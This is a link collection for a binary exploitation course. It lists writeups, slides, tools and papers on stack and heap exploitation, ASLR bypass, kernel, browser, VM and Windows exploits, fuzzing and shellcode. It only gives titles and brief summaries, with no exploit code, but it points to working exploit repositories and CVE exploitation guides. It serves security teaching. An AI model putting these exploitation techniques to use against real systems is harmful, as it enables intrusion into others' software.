resources.md

Resources

A collection of links related to exploit.courses / BFH course. Mostly Linux related. I may reference them in the course.

Good ones have been tagged by Recommended.

Complete Exploitation Courses

Open Security Trainings

• http://opensecuritytraining.info/IntermediateX86.html
• http://opensecuritytraining.info/IntroX86.html
• http://opensecuritytraining.info/IntroX86-64.html
• http://opensecuritytraining.info/Exploits1.html
• http://opensecuritytraining.info/Exploits2.html

Avatao

• Similar to exploit.courses (interactive shell), just more advanced
• Need to pay
• GDB Intro, Reversing Intro, Exploiting Intro

Binary Exploitation

• 6 Lectures
• Intro to stack exploit, shellcode, ASLR, ret2libc, formatstring

Fundamentals

GOT and PLT for pwning

• Article
• 2017
• GOT, PLT, RELRO description, exploiting related
• Recommended

What are the GOT and PLT? — Part 1

• 2017
• Good writeup

ELF Intro

• Executable and Linkable Format 101 - Part 1 Sections and Segments
• Executable and Linkable Format 101. Part 2: Symbols
• Executable and Linkable Format 101 Part 3: Relocations

Introduction to the ELF Format : The ELF Header (Part I)

• ATM Newst part, number 6: Introduction to the ELF Format (Part VI) : The Symbol Table and Relocations (Part 1)

Exploiting Cheat sheet

• Picture
• Cheatsheet

file descriptors

• Picture
• File Descriptors in Linux

JULIA'S DRAWINGS

• Simple drawings about linux fundamentals
• Recommended

Linux Internals - The Art Of Symbol Resolution

• adjectant to exploiting, interesting nevertheless
• Dynamic linking, got/plt related

Linux Exploitation

Bypass ASLR+NX Part 1

• 2018
• Doing local exploit with ASLR+DEP, via strcpy() the string sh to .bss with ROP, then system() it
• Recommended

return-to-csu: A New Method to Bypass 64-bit Linux ASLR

• 2018
• Doing ROP in .text with CSU section (Does not really bypass ASLR)

New bypass and protection techniques for ASLR on Linux

• 2018
• About how ASLR in current Linux Kernels works, in details
• Shows some tiny ASLR weaknesses
• Code: https://github.com/blackzert/aslur

ROPping to Victory

• 2018
• ROP guide with radare
• Very simple buffer overflow, which calls a predefined function

Binary Exploitation ELI5– Part 1

• Some intro to computers, memory model
• 2018
• Simple intro

STACK BASED BUFFER OVERFLOW ON 64 BIT LINUX

• Some Binary and Ascii intro
• Setuid, ASLR
• Write a BOF exploit for 64 bit linux

Heap Exploitation

Exim Off-by-one RCE: Exploiting CVE-2018-6789 with Fully Mitigations Bypassing

• Writeup about Exim Remote Exploit
• Lots of heap massage
• No shellcode used
• 2018
• Recommended
• Exploit Writeup: My PoC walk through for CVE-2018–6789

From Heap to RIP

• 2018
• attacking ptmalloc2 heap data structures

GlibC Malloc for Exploiters

• Slides
• Recommended
• 2018
• Heap introduction, exploiting view

x86 exploitation - heap overflows

• 2015
• Inter-chunk overflows and similar
• House Of Spirit
• House Of Lore
• House Of Force
• House Of Mind

Heap Viewer

• Tool for IDA
• ptmalloc2 heap viewer

Automatic Heap Layout Manipulation for Exploitation

• Paper
• 2018
• "SHRIKE discovers fragments of PHP code that interact with the interpreter’s heap in useful ways, such as making allocations and deallocations of particular sizes, or allocating objects containing sensitive data, such as pointers."

Linux Kernel Exploitation

Linux-Kernel-Exploit Stack Smashing

• 2018-02-15
• "Principle of kernel stack overflow and the user mode stack overflow are the same, we can use it to hijack control flow and privilge Escalation in Ring 0."
• Writeup

MMap Vulnerabilities – Linux Kernel

• 2018
• MMAP errors in drivers

Linux Defense

Linux Kernel Defence Map

• Overview of Linux Kernel defensive mechanisms

Fuzzing

The Art Of Fuzzing

• 2018, René Freingruber
• Complete, long introduction in fuzzing (slides, demos)
• A lot of Windows fuzzing (WinAFL)
• Recommended

fuzzing.io

• Material of Richard Johnson, Talos Security, Cisco
• Videos, Presentations, Tools
• State of the art & academic fuzzing material
• Recommended

IEEE Hacking Without Humans

• Papers related to DARPA CGC
• 2018

Google Fuzzer Test Suite

• Different vulnerable programs with known bugs
• Github repo

Go Speed Trace

• Slides, Cisco Talos, Richard Johnson
• About guided fuzzing / tracing / binary translation / hardware tracing
• More about closed source application tracing

Fuzzing arbitrary functions in ELF binaries

• 2018
• Fuzz dedicated functions of a binary with libfuzzer

VM Exploitation

Unboxing your virtualBox - Niklas Baumstark

• Virtualbox Exploitation
• Video
• 2018

A bunch of Red Pills: VMware Escapes

• List of several VMWare exploits (guest to host)
• 2018
• Good overview

Browser Exploitation

Building a 1-day Exploit for Google Chrome

• Presentation, Code
• 2018.03
• JavaScript, Heap

How to kill a (Fire)fox

• 2018, pwn2own bug
• Heap exploit

CVE-2017-0236 analysis

• UAF in Edge analysis, windbg
• 2018

Attacking JavaScript Engines

• 2016
• A case study of JavaScriptCore and CVE-2016-4622

Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174

• 2018
• UAF
• Short writeup

CTF

Pwntools Quick Reference Guide

• Short overview of useful pwntools features
• 2016

CTF Field Guide

• "In these chapters, you’ll find everything you need to win your next CTF competition"

Embedded Systems Exploiting

Exploitation: ARM & Xtensa compared

• 2018
• "Stacks, overflows, gadgets, asm, and things"
• Presentation

Exploitation on ARM-based Systems

• 2018
• Complete ARM exploitation intro

Exploitation of a Vanilla Buffer Overflow in the o2 HomeBox 6441 Router - A Step by Step Abuse Guide

• Step by step
• Simple expoloit, plus code
• Not so much ARM related

Windows

BugID

• Tool
• Check if a crash is exploitable

Windows 10 mitigations improvements

• Anti exploit mitigations in windows 10
• Lots of statistics, data, techniques
• 2016
• Recommended

Breaking CFI: Exploiting CVE-2015-5122 using COOP.

• New technique to bypass some CFI implementations

Exploiting CVE-2018-1038 - Total Meltdown

• Win7 Fail Meltdown Patch exploit
• Writing an easy Kernel exploit

ANALYSIS OF A WIN32K NULL POINTER DEREFERENCE BY MATCHING THE MAY PATCH

• 2018

A tale of two zero-days

• Double zero-day vulnerabilities fused into one. A mysterious sample enables attackers to execute arbitrary code with the highest privileges on intended targets

Adobe, Me and a Double Free :: Analyzing the CVE-2018-4990 Zero-Day Exploit

• 2018
• Double Free

7-Zip: From Uninitialized Memory to Remote Code Execution

• 2018
• Bug analysis

Game hacking reinvented? – A cod exploit

• 2017
• Call of duty game exploit
• Exploit: https://github.com/momo5502/cod-exploit

Reverse engineering the Path of Exile game protocol - Part 1: Obtaining the plaintext

• 2018
• Only reversing, no exploiting

Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack

• 2018
• APT related, MS related

Shellcoding

How to write a (Linux x86) egg hunter shellcode

• 2018
• Short article about egghunting (finding most of shellcode somewhere in memory)
• Related: Why do we need Egg Hunters ?

https://github.com/wetw0rk/Sickle

• Tool
• "Sickle is a shellcode development tool created to speed up the various steps needed to create functioning shellcode."

Debugging

C++ links: debugging: articles, documentation, software, and talks

• List of resources
• Many many links

Reverse Engineering

Reverse Engineering x64 for Beginners – Linux

• 2018
• Intro into reversing with GDB

Reverse Engineering With Radare2 – Part 3

• 2018
• Using Radare to reverse

BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)

• 2018
• How basic functions look in assembly